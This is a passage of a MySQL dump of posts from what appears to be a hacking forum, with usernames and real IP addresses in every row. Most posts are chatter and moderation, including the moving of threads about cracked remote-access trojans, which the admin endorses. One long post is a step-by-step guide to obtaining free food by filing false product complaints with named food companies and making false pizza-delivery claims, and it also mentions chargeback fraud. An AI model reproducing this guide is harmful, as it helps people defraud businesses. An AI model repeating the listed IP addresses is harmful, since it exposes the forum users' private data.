'dad61a3f3b441a1bc7608011a8da05f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5743', '1002', '5698', '3', 'RE: New mods and forum updates', '0', '1', 't3h jok3r', '1350750675', '[quote=\'R?????zo?\' pid=\'5698\' dateline=\'1350727169\'] Thanks for the updates looks nice, also lol\'ed on the last bonus pic. Btw the DDoS\'ers userbar is broken and forum icon is broken, also we need a clean up on the threads that\'s in there, since they are all related to Rat\'ing. [/quote] Thanks for reminding me. I got a request to delete fearless group so forgot about the ratters group. Thanks for reminding once again. I will handle it after I brush my teeth (I just woke up) [quote=\'iTzIpod\' pid=\'5738\' dateline=\'1350748064\'] I was talking with AF yesterday. He said that he gave up on the operation on LH. [/quote] That\'s good news. [b]Edited[/b] Done.', '72.231.24.165', '1223104677', '1', '0', '1', '1350752833', '1', '9bf0fdc74fa1cb41db5d9f331f0ad091', '0', '1350752833'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5727', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350747365', 'iTzIpod My username :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3816e8a5e1f127c5751ba90667848f74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5728', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '2', 'Apathy', '1350747413', 'Thanks for the tutorial. I am not a hamachi fan though.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '40c9b05af30e06adfdb14560e22d2cf0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5729', '190', '665', '56', 'RE: Copy and paste game', '0', '53', 'sirchamp', '1350747431', '127.0.0.1 tried dosing this. [spoiler]joke[/spoiler]', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '33eade21578a7fdba94e2ae456a465b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5730', '190', '665', '56', 'RE: Copy and paste game', '0', '2', 'Apathy', '1350747489', '************** One of my passwords. :P', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '0ee6145c1ceb5b4112c163d1c6340115', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5731', '126', '315', '15', 'RE: Adf.ly Bot', '0', '82', 'iTzIpod', '1350747515', 'It will. But very slowly.. I guess.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df26715a9012d7ca5010ba2f6bf0d7d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5732', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '82', 'iTzIpod', '1350747557', 'Nice guide. :) Thanks for the contribution.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '24802c26ceffc62ddf51a3d9ef07821c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5733', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '82', 'iTzIpod', '1350747633', 'I love this song.. >__> Haters gon hate.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a0bbb32fec01136fa1edc5a2f1f16cc8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5734', '928', '5194', '49', 'RE: MOTM', '0', '82', 'iTzIpod', '1350747760', 'I\'ve noticed. Keep it up Apathy. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '06e56a10164b93b01109475bcdb2d379', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5735', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '82', 'iTzIpod', '1350747797', 'It\'s legit to get that though.. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '984b8558b3b84f22c5ae875d02085fce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5736', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '82', 'iTzIpod', '1350747941', 'I hate people that do that..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d18f28f9e01efc3dac90fd36535648c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5737', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350747994', 'http://l33thacking.net/thread-190-page-10.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4767d38f0640475c055e9c4ad01bb5d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5738', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '82', 'iTzIpod', '1350748064', 'I was talking with AF yesterday. He said that he gave up on the operation on LH.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89c04d0510ad2ffeed7dd6be63b6a457', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5739', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350748227', 'why you say that? if you would only see without the photoshop you wouldn\'t know if it was scanned or not.', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', 'fb62752dba0bfc65be6f16d407c8cd9e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5740', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350748324', 'yeah I love the song, when I drive to work in the morning I put the sound on max and listen to it, people always stare at my car :3', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '0067fe78c3c591e8a5638a92c97e2206', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5741', '1013', '0', '16', 'The Official Magical Book of Free Food', '0', '62', 'R?????zo?', '1350748973', '[align=center][color=#9999ff]I\'ve decided, you know what, screw multiple tutorials, I\'m making one big tutorial on every food company. If you want another, PM me, and I\'ll see what I can do. Using what you learn from this, you should really be able to SE any food company without a tutorial. The companys I will cover in this include Pringles, Kelloggs, Dr. Pepper/Snapple, Pizza Hut/Pizza, Kraft, Sour Patch Kids, and more to come. Let\'s get started. [/color][/align] [align=center][color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color] [/align][align=center] [img]http://puu.sh/1geqt[/img] [color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color] [/align] Pringles are a delicious snack, often consumed in large proportions, and regretted later. Go here: http://www.pringles.com/askus Put the birthday, and select Product Concern. Put the product you want, leave UPC code and manufactering code empty, NO you don\'t still have that delicious snackaroo! For the message you need to love their product, and then slowly tell them something was wrong with it. [img]http://puu.sh/1gecl[/img] Now fill out all the other stuff legit, so you can recieve your reimbursement coupons. Snap crackle pop next thing you know you\'re getting this in your inbox: [img]http://puu.sh/1geeX[/img] If in the rare case they ask for the UPC code, (which they will if you try large amounts of cans, or call) just say it\'s not readable. Enjoy your Pringles! NOW! Onto Kelloggs! [align=center][color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color] [/align][align=center] [img]http://puu.sh/1gehH[/img] [color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color] [align=left]Kelloggs makes a bunch of stuff. It doesn\'t really matter what you say you bought, you\'ll be getting a coupon for any Kelloggs product. First hit up this link: http://www.kelloggs.com/en_US/contact-us.html Put your birthday, and select Product Concern. Continue! Put the item you want, skip UPC and manufactering codes, legit place, and a convincing story. Look below for an example. [img]http://puu.sh/1geo7[/img] Put valid shipping info, and next thing you know, you\'ve got an email like this: [img]http://puu.sh/1gepl[/img] Onto Dr. Pepper/Snapple! [align=center][color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color] [/align][align=center] [img]http://puu.sh/1get3[/img] [color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color] [align=left]Dr. Pepper is often considered the nector of the Gods. This is literally my favorite SE in history. Pay close attention. First you\'ll need to go here: http://www.drpeppersnapplegroup.com/ and figure out which drink you want. I\'m using Dr. Pepper for this, so it may not be the same as you. After you pick your drink, the contact links are below. [url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=7up&F2=7up][color=#999900]7-Up[/color][/url] [url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=rootbeer&F2=A_W][color=#663300]A&W[/color][/url] [url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=canadadry&F2=Canada_Dry&F9=http://www.canadadry.com/_external/contact/dpsg_style_loader.js.php][color=#009900]Canada Dry[/color][/url] [url=http://www.econsumeraffairs.com/am_bev/contactusmx.htm?F1=clamato&F2=Clamato][color=#ff0000]Clamato[/color][/url] (Spanish) [color=#99ff99]Country Time[/color] (Don\'t have a website) [url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=crush&F2=crush_soda][color=#ff6600]Crush [/color][/url] [color=#0000ff]Deja Blue[/color] (Don\'t have a website) [url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=dietrite&F2=Diet_Rite][color=#9999ff]Rite[/color][/url] [url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=drpepper][color=#ff0000]Dr. Pepper[/color][/url] There you go. Now, these are all pretty much the same, so try and follow along. Fill out all the beginning info legit. Select your flavor, and leave production code blank. You should be about like this: [img]http://puu.sh/1gePV[/img] Now for comments be creative. I like to say it was really sour or bitter or something. Leave UPC blank, and fill out everything else as best as you can. Submit! Next thing you know, you\'re getting emails like this: [img]http://puu.sh/1geSo[/img] [/align] [align=left]I\'m not sure why, but I just recieved a coupon in the mail after getting this. So... You may get something different... So! Now you\'re kind of needing some dinner! How about Pizza?! [align=center][color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color][/align][align=center] [img]http://puu.sh/1geUg[/img] [color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color] [align=left]Yum! Free pizza! Sounds good right? Well there are three ways of doing this, and it really works on any pizza place. You can of course do the illegal method, which I don\'t encourage, which is doing it over paypal and doing a chargeback after they deliver it, or you can call and make an order, and then cancel the order and continue from the 3rd line below. You can also do the way they technically gets you two pizzas for free! First, you\'ll actually need to order a pizza. Bummer right?! No, it will all pay off. Get your pizza delivered, and pay for it and stuff. Wait a few hours or a day or so and call them people up. Be all like \"Dawg, I just ordered a pizza a little bit ago, and that driver like threw that shit on the ground or something! I threw it away, it was so gross!\" Remember you must say you threw it away. If you did the method where you cancel your order, you can do this because they\'ll check to see if the order is in their system, and it will show up that it is. But then you only get one pizza! They\'ll most likely give you a new pizza after verifying you ordered one when you said you did. Be nice and tip the driver if they deliver! [/align][/align][/align][/align][/align][/align]', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '22c6eb0eb99cb73a52cd855e7d75d311', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5742', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '228', 'VirtualLegend', '1350749840', 'It looks real to me !!! Nice Tutorial', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b76997a9917d7dce317325d21409c4de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5744', '789', '4106', '19', '[Junk]ratters', '0', '1', 't3h jok3r', '1350752043', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5745', '853', '4502', '59', 'RE: My Way Of Spreading Method And Get Tons Of Installs', '0', '1', 't3h jok3r', '1350752102', 'Moved from the RATTERs private forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fb185229cd2d2e69935610e069eacbe1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5746', '796', '4155', '15', 'RE: CyberGate v1.18.0 Full Version Cracked', '0', '1', 't3h jok3r', '1350752129', 'Moved from the RATTERs private forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ffc2bfde960fc40ac9ada46293739c21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5747', '795', '4154', '15', 'RE: GreameRAT 1.5', '0', '1', 't3h jok3r', '1350752147', 'Moved from the RATTERs private forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b8f3069aceb5193afb874da278cde1b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5748', '797', '4156', '15', 'RE: DarkComet RAT v5.3.1', '0', '1', 't3h jok3r', '1350752154', 'Moved from the RATTERs private forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b7a82206730e01eee9fc0677f5dfac44', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5749', '798', '4157', '15', 'RE: Xtreme Rat 3.5 Cracked', '0', '1', 't3h jok3r', '1350752171', 'Moved from the RATTERs private forum. BTW, nice rat I have used it before.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2f5a0aab00d5aa3b552d6a806378888', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5750', '799', '4158', '15', 'RE: Darkcomet rat 5.4 Legacy Beta', '0', '1', 't3h jok3r', '1350752208', 'Moved from the RATTERs private forum. Download from the link above because the site has discontinued their project.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '467835ed6728a7fbd62db1965da74138', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5751', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '1', 't3h jok3r', '1350752250', 'Best RAT ever on the internet. This RAT has a lot of vouches.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c76259364d0a2bf38737ad8c09fd1c8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5752', '928', '5415', '49', 'RE: MOTM', '0', '1', 't3h jok3r', '1350752968', '[quote=\'iTzIpod\' pid=\'5415\' dateline=\'1350594534\'] Apathy, you\'re just too inactive. You need to post more. All everyone asks from you. As for the thread, I think we should do this. And a LH Weekly News Series. [/quote] News is not a bad addition either but there\'s not much happening on LH but if you can give me some suggestions on the weekly news then it would be great.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '19d585e4ca4d6835927d186120f3b384', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5753', '910', '5021', '49', 'RE: Referral Contest?', '0', '1', 't3h jok3r', '1350753035', 'I came up with a couple of ideas when I was eating breakfast today.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f95ffc60b3e06ee7f379b5d46830dd5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5754', '853', '4502', '59', 'RE: My Way Of Spreading Method And Get Tons Of Installs', '0', '258', 'PiXEL^OG', '1350754440', 'Will look into this , Thanks for the great share :D', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'ee36e1747e18f5c62969408518ae8529', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5755', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '258', 'PiXEL^OG', '1350754572', 'WOW this truly is amazing 10/10 Amazing tutorial , its just absolutely amazing', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '9b677251495c2127042f5481560a0895', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5756', '1014', '0', '7', 'My awards Or My Achievements plugin ?!', '0', '228', 'VirtualLegend', '1350754961', '[align=center][size=medium][color=#32CD32]Hello, Should I implement myawards plugin which can take up to weeks or should I install my achievements and all the previous awards given would be gone. [color=#FF0000]NOTE: It\'s is Joker\'s idea, and he approves this idea[/color] What do you think? Post your opinion below [/color][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5a008d934bf07c1cfb2dccc6a04fbe40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5757', '910', '5021', '49', 'RE: Referral Contest?', '0', '222', 'Exposé', '1350755052', 'Lol nice please share!!!! P.S what did you eat :P', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '14d52f7914790efc03c8e62bdb5d1457', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5758', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350755209', 'Thanks for the feeback, I like to contribute :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '49914556d17057220ca5e26dfa7ea894', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5759', '853', '4502', '59', 'RE: My Way Of Spreading Method And Get Tons Of Installs', '0', '62', 'R?????zo?', '1350755241', 'No problem, Enjoy guys :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '920224ddde61d7359d4d12e5530a2c8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5760', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '62', 'R?????zo?', '1350755302', 'The awards plugin would be nice, I think we should have that back.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd66b9d0311dec3dd599c59e45d2fb256', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5761', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '264', 'D?ea', '1350755363', 'I prefer award system. So yeah.. AWARD SYSTEM! If you guys need help, please contact me.', '87.55.196.22', '1463272470', '1', '0', '0', '0', '1', 'f0675fa1ea3e9f48322d26002449a65f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5762', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '61', 'NXK', '1350755462', 'Thank you everyone so much.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1d2ef112b36ace25a164d3f5b1a7a973', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5763', '928', '5752', '49', 'RE: MOTM', '0', '82', 'iTzIpod', '1350755502', '[quote=\'t3h jok3r\' pid=\'5752\' dateline=\'1350752968\'] [quote=\'iTzIpod\' pid=\'5415\' dateline=\'1350594534\'] Apathy, you\'re just too inactive. You need to post more. All everyone asks from you. As for the thread, I think we should do this. And a LH Weekly News Series. [/quote] News is not a bad addition either but there\'s not much happening on LH but if you can give me some suggestions on the weekly news then it would be great. [/quote] Says any new updates on the forums (New Subforums/Forums/Usergroups, etc) Milestones (iTzIpod reached 500k posts, t3h jok3r reached 3k posts, etc) MOTW (Member of the week) MOTM (First week of every month) (Member of the month) Weekly Activity (This week\'s total posts and threads, etc) I don\'t know :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e0ef3692034df59e52b6f1bc707fb9a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5764', '910', '5021', '49', 'RE: Referral Contest?', '0', '82', 'iTzIpod', '1350755533', 'What \"ideas\" did you think of?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ae7fd933799c4c42c91cf18203082667', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5765', '974', '5455', '61', 'RE: Get Abs Sitting at your Computer in 2 weeks!', '0', '62', 'R?????zo?', '1350755549', 'Not everyone has a six pack, and I would guess most of the people who\'s on this forums is actually fat :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9776d2ff81830f71164ead5eec5f7d6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5766', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '82', 'iTzIpod', '1350755615', '[10/19/2012 9:59:50 PM] The Anarchist | AF: Hey, we cancelled our op on LH. [10/19/2012 10:00:06 PM] The Anarchist | AF: Reason being, they aren\'t worth our time. Sorry if you\'re disappointed. [10/19/2012 10:00:56 PM] The Anarchist | AF: We\'d love to have you on the site, but we\'re no longer seeking revenge. [10/19/2012 10:01:17 PM] | The Anarchist | AF: We\'ve had 100+ posts just today, and I think we should focus our efforts on our site, and not theirs. [10/19/2012 10:01:37 PM] The Anarchist | AF: We could easily take them down eventually, but I think it\'d be more beneficial to work on our site.', '24.212.197.164', '416597412', '1', '0', '82', '1350755673', '1', '9e66f879543065e3a43a0ecb2f7d1b61', '0', '1350755673'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5767', '1002', '5743', '3', 'RE: New mods and forum updates', '0', '62', 'R?????zo?', '1350755662', '[quote=\'t3h jok3r\' pid=\'5743\' dateline=\'1350750675\'] Thanks for reminding me. I got a request to delete fearless group so forgot about the ratters group. Thanks for reminding once again. I will handle it after I brush my teeth (I just woke up) [/quote] No worries and thanks for moving the threads, looks clean now :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '09498edefb5b86d855a7c6f19ce72eb8', '0', '0'); INSERT INTO 